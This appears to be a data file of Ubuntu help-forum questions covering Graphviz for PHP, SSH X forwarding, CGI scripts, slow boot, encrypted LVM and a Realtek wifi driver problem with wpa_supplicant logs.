337585	how to install graphviz for php on ubunutu	what i want to do is install graphviz for php on ubuntu . i tried pear install image_graphviz , it installed but does not work for me . then i tried downloading the file from here . file name : libgv-php5_2.32.0-1~raring_amd64.deb when i run the file it says dependency is not satisfiable libgraphviz4 . all i want to do is run the code below which is from their documentation . unfortunately i can not find graphviz.php to download . < ? php require_once 'graphviz.php ' ; $ gv = new image_graphviz ( ) ; $ gv- > addedge ( array ( 'wake up ' = > 'visit bathroom ' ) ) ; $ gv- > addedge ( array ( 'visit bathroom ' = > 'make coffee ' ) ) ; $ gv- > image ( ) ; ? > how can i fix this issue ? where can i download graphviz.php
337594	how to open a gui program using a remote connection ( ssh ) ?	i am using ubuntu/gnome ( 10.04 ) to remotely connect to two ( slightly different ) embedded systems running ubuntu ( 12.04 ) . i use the following command for connection : ssh -x -l username 192.168.1.blah then , in the terminal i can use a command that run a gui based program , say gedit : gedit filename.txt now , on the first system , a nice gedit window is opened on my pc desktop , allowing me to edit the remote file . however , on the second system , i get the following error message : ** ( gedit:3637 ) : warning ** : could not connect to session bus why is it so , and how can i make the 2nd connection to work like the 1st one ? update 1 : the 1st machine reports linaro 12.03 , not 12.04 update 2 : here 's the output for dbus search ( dpkg -l *dbus* | grep ^i ) on the 1st machine : ii dbus 1.4.14-1ubuntu1 simple interprocess messaging system ( daemon and utilities ) ii dbus-x11 1.4.14-1ubuntu1 simple interprocess messaging system ( x11 deps ) ii gir1.2-dbusmenu-glib-0.4 0.5.0-0ubuntu4~linaro2 typelib file for libdbusmenu-glib4 ii gir1.2-dbusmenu-gtk-0.4 0.5.0-0ubuntu4~linaro2 typelib file for libdbusmenu-gtk4 ii libdbus-1-3 1.4.14-1ubuntu1.3 simple interprocess messaging system ( library ) ii libdbus-1-dev 1.4.14-1ubuntu1.3 simple interprocess messaging system ( development headers ) ii libdbus-glib-1-2 0.94-4 simple interprocess messaging system ( glib-based shared library ) ii libdbus-glib1.0-cil 0.5.0-3build1 cli implementation of d-bus ( glib mainloop integration ) ii libdbus1.0-cil 0.7.0-4 cli implementation of d-bus ii libdbusmenu-glib4 0.5.0-0ubuntu4~linaro2 library for passing menus over dbus ii libdbusmenu-gtk3-4 0.5.0-0ubuntu4~linaro2 library for passing menus over dbus - gtk+ version ii libdbusmenu-gtk4 0.5.0-0ubuntu4~linaro2 library for passing menus over dbus - gtk+ version ii libdbusmenu-qt2 0.9.0-0ubuntu2 a qt library that implements the dbusmenu spec ii libdconf-dbus-1-0 0.10.0-0ubuntu1 simple configuration storage system - d-bus library ii libnih-dbus1 1.0.3-4ubuntu2 nih d-bus bindings library ii libqt4-dbus 4:4.7.4-0ubuntu8.1linaro1 qt 4 d-bus module ii python-dbus 0.84.0-2 simple interprocess messaging system ( python interface ) ii qdbus 4:4.7.4-0ubuntu8.1linaro1 qt 4 dbus tool and here it is for the 2nd machine : ii dbus 1.4.18-1ubuntu1 simple interprocess messaging system ( daemon and utilities ) ii dbus-x11 1.4.18-1ubuntu1 simple interprocess messaging system ( x11 deps ) ii gir1.2-dbusmenu-glib-0.4 0.6.1-0ubuntu3 typelib file for libdbusmenu-glib4 ii gir1.2-dbusmenu-gtk-0.4 0.6.1-0ubuntu3 typelib file for libdbusmenu-gtk4 ii gir1.2-gjsdbus-1.0 1.32.0-1ubuntu1 gobject introspection data for gjs ii gstreamer-dbus-media-service 0.1.17-upstream-0ubuntu3 media service for ubuntu mobile ii libdbus-1-3 1.4.18-1ubuntu1 simple interprocess messaging system ( library ) ii libdbus-glib-1-2 0.98-1ubuntu1 simple interprocess messaging system ( glib-based shared library ) ii libdbusmenu-glib4 0.6.1-0ubuntu3 library for passing menus over dbus ii libdbusmenu-gtk3-4 0.6.1-0ubuntu3 library for passing menus over dbus - gtk+ version ii libdbusmenu-gtk4 0.6.1-0ubuntu3 library for passing menus over dbus - gtk+ version ii libdbusmenu-qt2 0.9.2-0ubuntu1 qt implementation of the dbusmenu protocol ii libnih-dbus1 1.0.3-4ubuntu9 nih d-bus bindings library ii libqt4-dbus 4:4.8.1-0ubuntu4 qt 4 d-bus module ii python-dbus 1.0.0-1ubuntu1 simple interprocess messaging system ( python interface ) ii python-dbus-dev 1.0.0-1ubuntu1 main loop integration development files for python-dbus ii qdbus 4:4.8.1-0ubuntu4 qt 4 d-bus tool
337598	how can i run python scripts on my webserver ?	i have a test script , /var/www/etym/cgi-bin/test.py # ! /usr/bin/python # -*- coding : utf-8 -*- # enable debugging import cgitb cgitb.enable ( ) print `` content-type : text/plain ; charset=utf-8 '' print `` hello world ! '' and i 'm trying to run it by going to http : //localhost/etym/cgi-bin/test.py in my browser , but it 's not working -- firefox just asks me whether i 'd like to open the file with gedit or save it to the disk . what do i need to do to get it to run ? i already ran chmod +x on the script .
337604	unable to see desktop in ubuntu 12.04	i am unable to see any desktop in ubuntu . when i turn on computer , it just shows a black screen , no wallpaper . however , if i open a program say chrome and try switching to desktop with alt + tab , i still keep seeing an image of chrome window on screen . here 's a screenshot of the desktop : i am running ubuntu 12.04 output of lspci -nnk | grep -iea3 `` ( graphics|vga ) '' : 00:02.0 vga compatible controller [ 0300 ] : intel corporation core processor integrated graphics controller [ 8086:0046 ] ( rev 02 ) subsystem : lenovo device [ 17aa:3920 ] kernel driver in use : i915 kernel modules : i915 output of uname -a : linux js 3.2.0-51-generic-pae # 77-ubuntu smp wed jul 24 20:40:32 utc 2013 i686 i686 i386 gnu/linux
337607	ubuntu got no .bash_login , .bash_profile	i 'm new to ubuntu and currently on it for assignment i need to run source ~/.bashrc at the first start of ubuntu to enably my alias at the starting of the program . i 've checked that i need to modify the .bash_login or .bash_profile but when i checked with ls -al , i could n't find both of the file , i got .profile , .bash_logout , .bash_aliases , and .bash_history my question is , anything wrong with my system or it is hidden somewhere a question aside , how can i start source ~/.bashrc at first run ?
337608	extend encrypted lvm	i want to add 400gb to my encrypted lvm added as home directory . this is the way it looks now : sda 8:0 0 465,8g 0 disk ├─sda1 8:1 0 94,1m 0 part /boot └─sda2 8:2 0 55,8g 0 part └─main 254:0 0 55,8g 0 crypt ├─main-swap 254:1 0 4g 0 lvm [ swap ] └─main-root 254:2 0 51,8g 0 lvm / how can i add the remaining 400gb to sda2/main/main-home ?
337612	can someone help me analyze the bootchart & dmesg logs for my slow booting ubuntu computer ?	my ubuntu computer takes 1-1.5 mins to boot up . following tips from this question , i generated the bootchart and saw the logs from dmsec but i ca n't figure what 's wrong . can someone please help ? this is what i see when i use the dmesg command : http : //pastebin.com/j6hnxl0i bootchart :
337614	why time taken to charge the laptop battery increases rapidly when it almost full ?	when my laptop is charging at first it charges normally . but when its charged about 98 % time remaining begins to increase why is this ?
337615	after updating ubuntu now i have a `` install release '' icon in the desktop , what should i do ?	there is an icon that showed up on my dashboard after updating to 12.04 called `` install release '' . when i go through steps to install it , i eventually get a notice saying : there is 'no operating system detected ' on my computer would i like to 'erase and use entire disk ' , or 'specify partitions manually ' . this is alarming , and i do n't know what it means . i also do n't know if i even need release .
337625	extremely slow boot time on ubuntu 12.04.3	i have no idea why my ubuntu boots so slowly . i finally decided to try to optimize with e4rat but it has n't helped . i 've run bootchart , and i ca n't understand it - there 's just a gap there . anyone have any idea how to read this ?
337628	`lshw -c network` showing drivers that i blacklisted	i 'm trying to get a usb dongle based on an 8192cu chip to work in ubuntu server . i 've been all over and have done lots of things to try to get this working with wpa_supplicant to no avail . my latest efforts are focused around updating the drivers . i 've installed the new 8192cu drivers . i have blacklisted the old rtl8192cu drivers . the new 8192cu drivers appear when i run lsmod but also shows used by 0 . trying to use wpa_supplicant : sudo wpa_supplicant -d wext -i wlan0 -c /etc/wpa_supplican/test.conf -d gets me : driver did not support siocsiwencodeext running without -d sudo wpa_supplicant -d wext -i wlan0 -c /etc/wpa_supplican/test.conf gets me : association request to the driver failed i 've tried nl80211 , but the wpa_supplicant results in 'failed to initialize driver interface ' . i 'm assuming this does n't work . if i run sudo iwlist scan , i can see the ap i want to associate with . when i run : lshw -c network the wlan0 interface shows up but in the configuration section , it lists : ... driver=rtl8192cu ... which is blacklisted . this seems wrong , and i feel like this is causing me my problems . how do i fix this ? edit1 : lsmod module size used by nouveau 855013 1 snd_emu10k1x 19556 0 snd_rawmidi 25426 1 snd_emu10k1x snd_seq_device 14138 1 snd_rawmidi ttm 76326 1 nouveau snd_ac97_codec 106118 1 snd_emu10k1x dcdbas 14099 0 drm_kms_helper 47459 1 nouveau snd_pcm 81124 2 snd_emu10k1x , snd_ac97_codec drm 240232 3 nouveau , ttm , drm_kms_helper microcode 18396 0 snd_timer 28932 1 snd_pcm snd 62675 6 snd_emu10k1x , snd_rawmidi , snd_seq_device , snd_ac97_codec , snd_pcm , snd_timer soundcore 14636 1 snd ac97_bus 12671 1 snd_ac97_codec i2c_algo_bit 13317 1 nouveau snd_page_alloc 14109 2 snd_emu10k1x , snd_pcm lpc_ich 16993 0 psmouse 91022 0 emu10k1_gp 12578 0 serio_raw 13032 0 gameport 15089 2 emu10k1_gp mxm_wmi 12894 1 nouveau video 19070 1 nouveau wmi 18745 2 nouveau , mxm_wmi mac_hid 13078 0 shpchp 32326 0 parport_pc 32115 1 8192cu 502664 0 ppdev 12850 0 lp 17456 0 parport 40931 3 parport_pc , ppdev , lp hid_generic 12485 0 usbhid 46054 0 hid 82511 2 hid_generic , usbhid usb_storage 39720 1 uas 17745 0 e100 36324 0 sata_sil 13276 4 floppy 60214 0 raid10 47818 0 raid456 65740 0 async_raid6_recov 12947 1 raid456 async_pq 12960 2 raid456 , async_raid6_recov raid6_pq 96919 2 async_raid6_recov , async_pq async_xor 12739 3 raid456 , async_raid6_recov , async_pq xor 26091 1 async_xor async_memcpy 12482 2 raid456 , async_raid6_recov async_tx 13124 5 raid456 , async_raid6_recov , async_pq , async_xor , async_memcpy raid1 35061 2 raid0 17102 0 multipath 12978 0 linear 12767 0 . lshw -c network *-network disabled description : ethernet interface product : 82801db pro/100 ve ( lom ) ethernet controller vendor : intel corporation physical id : 8 bus info : pci @ 0000:02:08.0 logical name : eth0 version : 81 serial : 00:07 : e9 : da:06 : c4 size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e100 driverversion=3.5.24-k2-napi duplex=half latency=64 link=no maxlatency=56 mingnt=8 multicast=yes port=mii speed=10mbit/s resources : irq:20 memory : fe1fe000-fe1fefff ioport : ec80 ( size=64 ) *-network disabled description : wireless interface physical id : 1 bus info : usb @ 1:1 logical name : wlan0 serial : 14 : d6:4d:47:13 : a7 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rtl8192cu multicast=yes wireless=unassociated here are some outputs from wpa_supplicant : wpa_supplicant -d wext -i wlan0 -c /etc/wpa_supplicant/testssid.conf trying to associate with c0 : c1 : c0:45:75:03 ( ssid='testssid ' freq=2427 mhz ) association request to the driver failed ctrl-event-disconnected bssid=c0 : c1 : c0:45:75:03 reason=0 authentication with 00:00:00:00:00:00 timed out . trying to associate with c0 : c1 : c0:45:75:03 ( ssid='testssid ' freq=2427 mhz ) association request to the driver failed ctrl-event-disconnected bssid=c0 : c1 : c0:45:75:03 reason=0 authentication with 00:00:00:00:00:00 timed out . trying to associate with c0 : c1 : c0:45:75:03 ( ssid='testssid ' freq=2427 mhz ) association request to the driver failed ctrl-event-disconnected bssid=c0 : c1 : c0:45:75:03 reason=0 ctrl-event-terminating - signal 2 received . wpa_supplicant -d wext -i wlan0 -c /etc/wpa_supplicant/testssid.conf -dd initializing interface 'wlan0 ' conf '/etc/wpa_supplicant/testssid.conf ' driver 'wext ' ctrl_interface 'n/a ' bridge 'n/a' configuration file '/etc/wpa_supplicant/testssid.conf ' - > '/etc/wpa_supplicant/testssid.conf' reading configuration file '/etc/wpa_supplicant/testssid.conf' line : 1 - start of a new network block ssid - hexdump_ascii ( len=8 ) : xx xx 72 xx xx xx xx xx testssid psk - hexdump ( len=32 ) : [ removed ] key_mgmt : 0x2 pairwise : 0x8 group : 0x8 proto : 0x1 priority group 0 id=0 ssid='testssid' siocgiwrange : we ( compiled ) =22 we ( source ) =16 enc_capa=0xf capabilities : key_mgmt 0xf enc 0xf flags 0x0 wext : failed to set bogus bssid/ssid to disconnect netlink : operstate : linkmode=1 , operstate=5 own mac address : 14 : d6:4d:47:13 : a7 wpa_driver_wext_set_key : alg=0 key_idx=0 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=1 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=2 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=3 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=4 set_tx=0 seq_len=0 key_len=0 driver did not support siocsiwencodeext wpa_driver_wext_set_key : alg=0 key_idx=5 set_tx=0 seq_len=0 key_len=0 driver did not support siocsiwencodeext wpa_driver_wext_set_countermeasures rsn : flushing pmkid list in the driver setting scan request : 0 sec 100000 usec wps : uuid based on mac address - hexdump ( len=16 ) : 0a 0c 18 0e e2 0e 53 35 a2 00 f2 f6 6f a9 25 02 eapol : supp_pae entering state disconnected eapol : supplicant port status : unauthorized eapol : key_rx entering state no_key_receive eapol : supp_be entering state initialize eap : eap entering state disabled eapol : supplicant port status : unauthorized eapol : supplicant port status : unauthorized added interface wlan0 rtm_newlink : operstate=0 ifi_flags=0x1043 ( [ up ] [ running ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added rtm_newlink : operstate=0 ifi_flags=0x1043 ( [ up ] [ running ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wireless event : cmd=0x8b06 len=8 rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added state : disconnected - > scanning starting ap scan for wildcard ssid scan requested ( ret=0 ) - scan timeout 5 seconds eapol : disable timer tick eapol : supplicant port status : unauthorized rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wireless event : cmd=0x8b19 len=8 received 205 bytes of scan results ( 1 bsses ) bss : start scan result update 1 bss : add new id 0 bssid c0 : c1 : c0:45:75:03 ssid 'testssid' new scan results available selecting bss from priority group 0 try to find wpa-enabled ap 0 : c0 : c1 : c0:45:75:03 ssid='testssid ' wpa_ie_len=24 rsn_ie_len=0 caps=0x11 selected based on wpa ie selected wpa ap c0 : c1 : c0:45:75:03 ssid='testssid' trying to associate with c0 : c1 : c0:45:75:03 ( ssid='testssid ' freq=2427 mhz ) ft : stored mdie and ftie from ( re ) association response - hexdump ( len=0 ) : cancelling scan request wpa : clearing own wpa/rsn ie automatic auth_alg selection : 0x1 wpa : using ieee 802.11i/d3.0 wpa : selected cipher suites : group 8 pairwise 8 key_mgmt 2 proto 1 wpa : set ap wpa ie - hexdump ( len=26 ) : dd 18 00 50 f2 01 01 00 00 50 f2 02 01 00 00 50 f2 02 01 00 00 50 f2 02 0c 00 wpa : clearing ap rsn ie wpa : using gtk tkip wpa : using ptk tkip wpa : using key_mgmt wpa-psk wpa : not using mgmt group cipher wpa : set own wpa ie default - hexdump ( len=24 ) : dd 16 00 50 f2 01 01 00 00 50 f2 02 01 00 00 50 f2 02 01 00 00 50 f2 02 no keys have been configured - skip key clearing state : scanning - > associating wpa_driver_wext_set_operstate : operstate 0- > 0 ( dormant ) netlink : operstate : linkmode=-1 , operstate=5 wpa_driver_wext_associate wpa_driver_wext_set_drop_unencrypted wpa_driver_wext_set_psk association request to the driver failed setting authentication timeout : 5 sec 0 usec eapol : external notification - eap success=0 eapol : supplicant port status : unauthorized eapol : external notification - eap fail=0 eapol : supplicant port status : unauthorized eapol : external notification - portcontrol=auto eapol : supplicant port status : unauthorized rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wireless event : cmd=0x8b06 len=8 rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wireless event : cmd=0x8b04 len=12 rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wireless event : cmd=0x8c02 len=74 wext : custom wireless event : 'associnfo ( reqies=dd160050f20101000050f20201000050f20201000050f202 ) ' association info event req_ies - hexdump ( len=24 ) : dd 16 00 50 f2 01 01 00 00 50 f2 02 01 00 00 50 f2 02 01 00 00 50 f2 02 wpa : set own wpa/rsn ie - hexdump ( len=24 ) : dd 16 00 50 f2 01 01 00 00 50 f2 02 01 00 00 50 f2 02 01 00 00 50 f2 02 ft : stored mdie and ftie from ( re ) association response - hexdump ( len=0 ) : rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wireless event : cmd=0x8b1a len=16 rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wireless event : cmd=0x8b15 len=20 wireless event : new ap : 00:00:00:00:00:00 disassociation notification added bssid c0 : c1 : c0:45:75:03 into blacklist ctrl-event-disconnected bssid=c0 : c1 : c0:45:75:03 reason=0 disconnect event - remove keys wpa_driver_wext_set_key : alg=0 key_idx=0 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=1 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=2 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=3 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=4 set_tx=0 seq_len=0 key_len=0 driver did not support siocsiwencodeext wpa_driver_wext_set_key : alg=0 key_idx=5 set_tx=0 seq_len=0 key_len=0 driver did not support siocsiwencodeext wpa_driver_wext_set_key : alg=0 key_idx=0 set_tx=0 seq_len=0 key_len=0 state : associating - > disconnected wpa_driver_wext_set_operstate : operstate 0- > 0 ( dormant ) netlink : operstate : linkmode=-1 , operstate=5 eapol : external notification - portenabled=0 eapol : supplicant port status : unauthorized eapol : external notification - portvalid=0 eapol : supplicant port status : unauthorized eapol : external notification - eap success=0 eapol : supplicant port status : unauthorized authentication with 00:00:00:00:00:00 timed out . added bssid 00:00:00:00:00:00 into blacklist no keys have been configured - skip key clearing state : disconnected - > disconnected wpa_driver_wext_set_operstate : operstate 0- > 0 ( dormant ) netlink : operstate : linkmode=-1 , operstate=5 eapol : external notification - portenabled=0 eapol : supplicant port status : unauthorized eapol : external notification - portvalid=0 eapol : supplicant port status : unauthorized eapol : external notification - eap success=0 eapol : supplicant port status : unauthorized setting scan request : 0 sec 0 usec state : disconnected - > scanning starting ap scan for wildcard ssid scan requested ( ret=0 ) - scan timeout 30 seconds rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wireless event : cmd=0x8b19 len=8 received 205 bytes of scan results ( 1 bsses ) bss : start scan result update 2 new scan results available selecting bss from priority group 0 try to find wpa-enabled ap 0 : c0 : c1 : c0:45:75:03 ssid='testssid ' wpa_ie_len=24 rsn_ie_len=0 caps=0x11 selected based on wpa ie selected wpa ap c0 : c1 : c0:45:75:03 ssid='testssid' trying to associate with c0 : c1 : c0:45:75:03 ( ssid='testssid ' freq=2427 mhz ) ft : stored mdie and ftie from ( re ) association response - hexdump ( len=0 ) : cancelling scan request wpa : clearing own wpa/rsn ie automatic auth_alg selection : 0x1 wpa : using ieee 802.11i/d3.0 wpa : selected cipher suites : group 8 pairwise 8 key_mgmt 2 proto 1 wpa : set ap wpa ie - hexdump ( len=26 ) : dd 18 00 50 f2 01 01 00 00 50 f2 02 01 00 00 50 f2 02 01 00 00 50 f2 02 0c 00 wpa : clearing ap rsn ie wpa : using gtk tkip wpa : using ptk tkip wpa : using key_mgmt wpa-psk wpa : not using mgmt group cipher wpa : set own wpa ie default - hexdump ( len=24 ) : dd 16 00 50 f2 01 01 00 00 50 f2 02 01 00 00 50 f2 02 01 00 00 50 f2 02 no keys have been configured - skip key clearing state : scanning - > associating wpa_driver_wext_set_operstate : operstate 0- > 0 ( dormant ) netlink : operstate : linkmode=-1 , operstate=5 wpa_driver_wext_associate wpa_driver_wext_set_drop_unencrypted wpa_driver_wext_set_psk association request to the driver failed setting authentication timeout : 5 sec 0 usec eapol : external notification - eap success=0 eapol : supplicant port status : unauthorized eapol : external notification - eap fail=0 eapol : supplicant port status : unauthorized eapol : external notification - portcontrol=auto eapol : supplicant port status : unauthorized rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wireless event : cmd=0x8b06 len=8 rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wireless event : cmd=0x8b04 len=12 rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wireless event : cmd=0x8c02 len=74 wext : custom wireless event : 'associnfo ( reqies=dd160050f20101000050f20201000050f20201000050f202 ) ' association info event req_ies - hexdump ( len=24 ) : dd 16 00 50 f2 01 01 00 00 50 f2 02 01 00 00 50 f2 02 01 00 00 50 f2 02 wpa : set own wpa/rsn ie - hexdump ( len=24 ) : dd 16 00 50 f2 01 01 00 00 50 f2 02 01 00 00 50 f2 02 01 00 00 50 f2 02 ft : stored mdie and ftie from ( re ) association response - hexdump ( len=0 ) : rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wireless event : cmd=0x8b1a len=16 rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wireless event : cmd=0x8b15 len=20 wireless event : new ap : 00:00:00:00:00:00 disassociation notification bssid c0 : c1 : c0:45:75:03 blacklist count incremented to 2 ctrl-event-disconnected bssid=c0 : c1 : c0:45:75:03 reason=0 disconnect event - remove keys wpa_driver_wext_set_key : alg=0 key_idx=0 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=1 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=2 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=3 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=4 set_tx=0 seq_len=0 key_len=0 driver did not support siocsiwencodeext wpa_driver_wext_set_key : alg=0 key_idx=5 set_tx=0 seq_len=0 key_len=0 driver did not support siocsiwencodeext wpa_driver_wext_set_key : alg=0 key_idx=0 set_tx=0 seq_len=0 key_len=0 state : associating - > disconnected wpa_driver_wext_set_operstate : operstate 0- > 0 ( dormant ) netlink : operstate : linkmode=-1 , operstate=5 eapol : external notification - portenabled=0 eapol : supplicant port status : unauthorized eapol : external notification - portvalid=0 eapol : supplicant port status : unauthorized eapol : external notification - eap success=0 eapol : supplicant port status : unauthorized authentication with 00:00:00:00:00:00 timed out . bssid 00:00:00:00:00:00 blacklist count incremented to 2 no keys have been configured - skip key clearing state : disconnected - > disconnected wpa_driver_wext_set_operstate : operstate 0- > 0 ( dormant ) netlink : operstate : linkmode=-1 , operstate=5 eapol : external notification - portenabled=0 eapol : supplicant port status : unauthorized eapol : external notification - portvalid=0 eapol : supplicant port status : unauthorized eapol : external notification - eap success=0 eapol : supplicant port status : unauthorized setting scan request : 0 sec 0 usec state : disconnected - > scanning starting ap scan for wildcard ssid scan requested ( ret=0 ) - scan timeout 30 seconds rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wireless event : cmd=0x8b19 len=8 received 205 bytes of scan results ( 1 bsses ) bss : start scan result update 3 new scan results available selecting bss from priority group 0 try to find wpa-enabled ap 0 : c0 : c1 : c0:45:75:03 ssid='testssid ' wpa_ie_len=24 rsn_ie_len=0 caps=0x11 skip - blacklisted try to find non-wpa ap 0 : c0 : c1 : c0:45:75:03 ssid='testssid ' wpa_ie_len=24 rsn_ie_len=0 caps=0x11 skip - blacklisted no aps found - clear blacklist and try again removed bssid 00:00:00:00:00:00 from blacklist ( clear ) removed bssid c0 : c1 : c0:45:75:03 from blacklist ( clear ) selecting bss from priority group 0 try to find wpa-enabled ap 0 : c0 : c1 : c0:45:75:03 ssid='testssid ' wpa_ie_len=24 rsn_ie_len=0 caps=0x11 selected based on wpa ie selected wpa ap c0 : c1 : c0:45:75:03 ssid='testssid' trying to associate with c0 : c1 : c0:45:75:03 ( ssid='testssid ' freq=2427 mhz ) ft : stored mdie and ftie from ( re ) association response - hexdump ( len=0 ) : cancelling scan request wpa : clearing own wpa/rsn ie automatic auth_alg selection : 0x1 wpa : using ieee 802.11i/d3.0 wpa : selected cipher suites : group 8 pairwise 8 key_mgmt 2 proto 1 wpa : set ap wpa ie - hexdump ( len=26 ) : dd 18 00 50 f2 01 01 00 00 50 f2 02 01 00 00 50 f2 02 01 00 00 50 f2 02 0c 00 wpa : clearing ap rsn ie wpa : using gtk tkip wpa : using ptk tkip wpa : using key_mgmt wpa-psk wpa : not using mgmt group cipher wpa : set own wpa ie default - hexdump ( len=24 ) : dd 16 00 50 f2 01 01 00 00 50 f2 02 01 00 00 50 f2 02 01 00 00 50 f2 02 no keys have been configured - skip key clearing state : scanning - > associating wpa_driver_wext_set_operstate : operstate 0- > 0 ( dormant ) netlink : operstate : linkmode=-1 , operstate=5 wpa_driver_wext_associate wpa_driver_wext_set_drop_unencrypted wpa_driver_wext_set_psk association request to the driver failed setting authentication timeout : 5 sec 0 usec eapol : external notification - eap success=0 eapol : supplicant port status : unauthorized eapol : external notification - eap fail=0 eapol : supplicant port status : unauthorized eapol : external notification - portcontrol=auto eapol : supplicant port status : unauthorized rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wireless event : cmd=0x8b06 len=8 rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wireless event : cmd=0x8b04 len=12 rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wireless event : cmd=0x8c02 len=74 wext : custom wireless event : 'associnfo ( reqies=dd160050f20101000050f20201000050f20201000050f202 ) ' association info event req_ies - hexdump ( len=24 ) : dd 16 00 50 f2 01 01 00 00 50 f2 02 01 00 00 50 f2 02 01 00 00 50 f2 02 wpa : set own wpa/rsn ie - hexdump ( len=24 ) : dd 16 00 50 f2 01 01 00 00 50 f2 02 01 00 00 50 f2 02 01 00 00 50 f2 02 ft : stored mdie and ftie from ( re ) association response - hexdump ( len=0 ) : rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wireless event : cmd=0x8b1a len=16 rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wireless event : cmd=0x8b15 len=20 wireless event : new ap : 00:00:00:00:00:00 disassociation notification added bssid c0 : c1 : c0:45:75:03 into blacklist ctrl-event-disconnected bssid=c0 : c1 : c0:45:75:03 reason=0 disconnect event - remove keys wpa_driver_wext_set_key : alg=0 key_idx=0 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=1 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=2 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=3 set_tx=0 seq_len=0 key_len=0 wpa_driver_wext_set_key : alg=0 key_idx=4 set_tx=0 seq_len=0 key_len=0 driver did not support siocsiwencodeext wpa_driver_wext_set_key : alg=0 key_idx=5 set_tx=0 seq_len=0 key_len=0 driver did not support siocsiwencodeext wpa_driver_wext_set_key : alg=0 key_idx=0 set_tx=0 seq_len=0 key_len=0 state : associating - > disconnected wpa_driver_wext_set_operstate : operstate 0- > 0 ( dormant ) netlink : operstate : linkmode=-1 , operstate=5 eapol : external notification - portenabled=0 eapol : supplicant port status : unauthorized eapol : external notification - portvalid=0 eapol : supplicant port status : unauthorized eapol : external notification - eap success=0 eapol : supplicant port status : unauthorized ctrl-event-terminating - signal 2 received removing interface wlan0 no keys have been configured - skip key clearing state : disconnected - > disconnected wpa_driver_wext_set_operstate : operstate 0- > 0 ( dormant ) netlink : operstate : linkmode=-1 , operstate=5 eapol : external notification - portenabled=0 eapol : supplicant port status : unauthorized eapol : external notification - portvalid=0 eapol : supplicant port status : unauthorized eapol : external notification - eap success=0 eapol : supplicant port status : unauthorized wpa_driver_wext_set_countermeasures no keys have been configured - skip key clearing removed bssid c0 : c1 : c0:45:75:03 from blacklist ( clear ) bss : remove id 0 bssid c0 : c1 : c0:45:75:03 ssid 'testssid' cancelling scan request cancelling authentication timeout wext : failed to set bogus bssid/ssid to disconnect netlink : operstate : linkmode=0 , operstate=6
337632	sharing torrents between ubuntu and windows	i have a dual boot system with ubuntu and win7 . the torrents are downloaded to the same folder , but is there a way to easily share the magnet links between the two deludge installations ? this would be easy with the old torrent files , but now a days only magnet links are used . example of what i want : i 'm in ubuntu and start a torrent download . before it 's finished i switch to windows and open deludge which will continue the download . as it is now i have to manually add the link to my windows deludge and vice versa , so my question is ; is there any smoother way to handle this operation ?
